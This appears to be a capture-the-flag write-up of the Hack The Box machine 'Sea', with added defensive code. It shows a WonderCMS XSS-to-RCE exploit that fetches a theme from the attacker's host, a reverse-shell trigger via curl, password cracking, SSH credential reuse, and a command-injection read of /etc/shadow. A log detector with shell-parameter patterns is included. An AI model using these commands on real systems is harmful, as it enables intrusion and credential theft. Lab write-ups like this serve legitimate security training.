Sea
Recon
HTTP (80)
The website had an HTML form, but nothing worked: no request was sent to the server on submit, and XSS payloads had no effect in any of the fields.

Directory enumeration was also unsuccessful.
WonderCMS
http://sea.htb/themes/bike/README.md
└─$ curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
Looks like the bike theme is a WonderCMS theme, so the site is running WonderCMS!
And it's open source https://github.com/WonderCMS/wondercms
└─$ curl http://sea.htb/themes/bike/version
3.2.0
XSS -> RCE
This version of WonderCMS (3.2.0) is vulnerable to CVE-2023-41425, a cross-site scripting bug in the theme/module installer. The public PoC chains it into RCE: the XSS payload makes the logged-in admin's browser install a theme zip hosted on the attacker's machine, which drops a PHP reverse shell (rev.php) under themes/ that the attacker then triggers with a plain GET.
└─$ py exploit.py 'http://sea.htb/loginURL' 10.10.14.197 4444
...
---
# Added later; basically the same steps as the PoC
└─$ curl "http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.197&lport=4444"
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.28:35652.
$ whoami
www-data
Note: After some sweat and blood I discovered that the exploit doesn't work, and I blame the box configuration: sometimes it made a single request within ~10h 🥴. The exploit was already sitting in the themes directory, ready to be triggered... (EVEN WHEN A NEW BOX WAS SPAWNED)
Another note: make sure to change the URLs in the PoC to point at your own host (LHOST/LPORT), as the box doesn't have access to the internet and can only fetch the theme zip from you.
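The chain above leaves two distinct traces in the web server's access log: the admin's browser being driven to install a theme from an attacker-controlled URL, and a direct GET for a .php file under themes/ (the rev.php?lhost=...&lport=... trigger). The following detector is an added example, not code from the writeup or from WonderCMS; the installer parameter names (installModule, directoryName, type) are assumed from the WonderCMS source, the "only GitHub is a legitimate module source" rule is an assumption, and the Apache log lines are constructed for the example rather than captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not captured from sea.htb).
SAMPLE_LOG = """\
10.10.14.197 - - [11/Aug/2024:12:01:02 +0000] "GET /themes/bike/README.md HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.10.11.28 - - [11/Aug/2024:12:03:45 +0000] "GET /?installModule=http://10.10.14.197:8000/revshell-main.zip&directoryName=revshell&type=themes&token=abc HTTP/1.1" 200 2048 "http://sea.htb/loginURL" "Mozilla/5.0"
10.10.14.197 - - [11/Aug/2024:12:04:10 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.197&lport=4444 HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.50 - - [11/Aug/2024:12:05:00 +0000] "GET /themes/bike/css/style.css HTTP/1.1" 200 3210 "http://sea.htb/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: legitimate WonderCMS themes/plugins are fetched from GitHub only.
LEGIT_MODULE_HOSTS = {"github.com", "www.github.com"}
# Query parameter names commonly used by dropped PHP shells.
SHELL_PARAMS = {"lhost", "lport", "cmd", "c"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a list of findings for one parsed request (empty list if benign)."""
    findings = []
    url = urlsplit(entry["target"])
    qs = parse_qs(url.query)
    # Stage 1: module/theme install whose source URL is not a trusted host.
    if "installModule" in qs:
        src = urlsplit(qs["installModule"][0])
        if src.hostname not in LEGIT_MODULE_HOSTS:
            findings.append(
                f"module install from untrusted host {src.hostname!r} "
                f"(type={qs.get('type', ['?'])[0]})"
            )
    # Stage 2: a PHP file requested directly from a theme/plugin directory.
    # Theme PHP is normally included server-side, never fetched by a client.
    if re.match(r"^/(themes|plugins)/[^/]+/.*\.php$", url.path):
        suspicious = SHELL_PARAMS & set(qs)
        msg = f"direct PHP request under {url.path}"
        if suspicious:
            msg += f" with shell-like params {sorted(suspicious)}"
        findings.append(msg)
    return findings


def scan(log_text):
    """Map (client ip, request target) -> findings for every suspicious line."""
    hits = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits[(entry["ip"], entry["target"])] = findings
    return hits


if __name__ == "__main__":
    for key, findings in scan(SAMPLE_LOG).items():
        print(key, findings)
```

Stage 2 alone is the higher-confidence signal: a client fetching any .php under /themes/ or /plugins/ is abnormal for WonderCMS regardless of parameter names, while stage 1 depends on knowing which module sources the site legitimately uses.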

www-data@sea:/var/www/sea/data$ cat database.js | grep pass -i
cat database.js | grep pass -i
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"content": "<h1>How can I participate?<\/h1>\n<p>To participate, you only need to send your data as a participant through <a href=\"http:\/\/sea.htb\/contact.php\">contact<\/a>. Simply enter your name, email, age and country. In addition, you can optionally add your website related to your passion for night racing.<\/p>",
Crack password
Not sure why there are `\` in the hash, but hashcat and john didn't like that. Remove them and start cracking the hash.
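The `\/` sequences are JSON escaping of `/` (PHP's json_encode escapes forward slashes by default), so decoding the file as JSON instead of grepping it yields a hash the crackers accept. The following is an added example, not code from the writeup or from WonderCMS; the database.js sample is constructed to mirror the structure grepped above, and the field layout (config.password) is assumed.

```python
import json
import re

# Constructed sample mirroring the shape of WonderCMS database.js (assumed layout).
SAMPLE_DATABASE_JS = r'''
{
    "config": {
        "siteTitle": "Sea",
        "login": "loginURL",
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"
    },
    "pages": {
        "home": {
            "content": "<p>hello<\/p>"
        }
    }
}
'''

# $2a$/$2b$/$2y$, two-digit cost, then 22 chars of salt + 31 chars of digest.
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")


def extract_password_hash(database_js: str) -> str:
    """Return the admin password hash with JSON escaping removed.

    json.loads() turns every ``\\/`` back into ``/``; a text grep leaves the
    backslashes in and both hashcat and john reject the result.
    """
    data = json.loads(database_js)
    return data["config"]["password"]


def is_bcrypt(h: str) -> bool:
    """Sanity check: does the string have bcrypt's exact shape (hashcat -m 3200)?"""
    return BCRYPT_RE.fullmatch(h) is not None


def bcrypt_cost(h: str) -> int:
    """Iteration count from the $2y$NN$ prefix: cost 10 -> 2**10 = 1024,
    matching john's 'Cost 1 (iteration count) is 1024' line."""
    return 2 ** int(h.split("$")[2])


def write_hash_file(h: str, path: str) -> None:
    """Write one hash per line, the format both hashcat and john read."""
    with open(path, "w") as f:
        f.write(h + "\n")


if __name__ == "__main__":
    h = extract_password_hash(SAMPLE_DATABASE_JS)
    print(h, is_bcrypt(h), bcrypt_cost(h))
```

The shape check is worth keeping: the escaped string from grep fails it (a backslash is not in bcrypt's alphabet), which is exactly why the tools refused it.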
➜ cat .\hashes
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
➜ .\hashcat.exe --show hashes
...
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
...
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt --format=bcrypt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:48 DONE (2024-08-11 16:54) 0.02076g/s 64.27p/s 64.27c/s 64.27C/s iamcool..carpediem
Use the "--show" option to display all of the cracked passwords reliably
Session completed
There are only 2 users:
$ ls -Alh /home
total 8.0K
drwxr-xr-x 4 amay amay 4.0K Aug 1 12:22 amay
drwxr-x--- 4 geo geo 4.0K Aug 1 12:13 geo
SSH (22)
Creds (the cracked CMS password is reused for amay's SSH login):
amay:mychemicalromance
User.txt
amay@sea:~$ cat user.txt
e4d3732c9c102d3a4975a05de384f534
Privilege Escalation
There seem to be internal applications listening on localhost only:
amay@sea:~$ ss -tunlp4
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 123 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:40319 0.0.0.0:*
amay@sea:~$ curl 0:8080
Unauthorized access
amay@sea:~$ curl 0:8080 -X OPTIONS -i
HTTP/1.0 401 Unauthorized
Host: 0:8080
Date: Sun, 11 Aug 2024 13:04:27 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.23
WWW-Authenticate: Basic realm="Restricted Area"
Content-type: text/html; charset=UTF-8
Unauthorized access
amay@sea:/var$ curl 0:8080 -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ=='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>System Monitor(Developing)</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.container {
width: 800px;
background-color: #ffffff;
border-radius: 10px;
box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
padding: 20px;
}
h1 {
color: #333333;
text-align: center;
margin-top: 0;
}
.status {
padding: 20px;
border-bottom: 1px solid #cccccc;
margin-bottom: 20px;
}
.status:last-child {
border-bottom: none;
margin-bottom: 0;
}
.status h2 {
color: #666666;
margin-top: 0;
}
.status p {
color: #333333;
margin: 10px 0;
}
.status.error {
background-color: #ffe6e6;
}
.status.success {
background-color: #e6ffe6;
}
.button {
background-color: #4CAF50;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
margin-top: 10px;
transition: background-color 0.3s;
display: inline-block;
}
.button:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<div class="container">
<h1>System Monitor(Developing)</h1>
<div class="status">
<h2>Disk Usage</h2>
/dev/mapper/ubuntu--vg-ubuntu--lv 6.6G 4.2G 2.1G 68% /
<p>Used: </p>
<p>Total: 68%</p>
</div>
<div class="status">
<h2>System Management</h2>
<form action="" method="post">
<button type="submit" name="clean_apt" class="button">Clean system with apt</button>
<button type="submit" name="update_system" class="button">Update system</button>
<button type="submit" name="clear_auth_log" class="button">Clear auth.log</button>
<button type="submit" name="clear_access_log" class="button">Clear access.log</button>
</form>
</div>
<div class="status">
<h2>Analyze Log File</h2>
<form action="" method="post">
<select name="log_file">
<option value="/var/log/apache2/access.log">access.log</option>
<option value="/var/log/auth.log">auth.log</option>
</select>
<button type="submit" name="analyze_log" class="button">Analyze</button>
</form>
</div>
</div>
</body>
</html>
By adding an Authorization header carrying amay's credentials (base64 of amay:mychemicalromance, i.e. HTTP Basic auth), we are able to view the page.
Forward the port over SSH (local 8080 to 127.0.0.1:8080 on the box):
└─$ ssh amay@sea.htb -L 8080:0:8080
HTTP (8080)

"Analyze Log File" lets us read files. The paths look hardcoded in the select options, but they are just a POST parameter (log_file), so the client can send any value.
I didn't have Burp open and was too lazy to turn it back on, so I just edited the HTML to read the desired file, like /etc/shadow.

It looks like the app is literally searching for "suspicious" content: /etc/shadow has some suspicious characters, so it doesn't show the full file, but if we inject something into the filename, the whole file becomes suspicious and is shown in full:
└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/etc/shadow;x&analyze_log='
...
root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
...
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
...
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::
_laurel:!:19936::::::
I was not able to read /root/.ssh/id_rsa :/
Root.txt
└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/root/root.txt;x&analyze_log=' -s | grep 'Analyze</button>' -A100
<button type="submit" name="analyze_log" class="button">Analyze</button>
</form>
9cf24e872d21a687c5238a7fd92785f8
<p class='error'>Suspicious traffic patterns detected in /root/root.txt;x:</p><pre>9cf24e872d21a687c5238a7fd92785f8</pre> </div>
</div>
</body>
</html>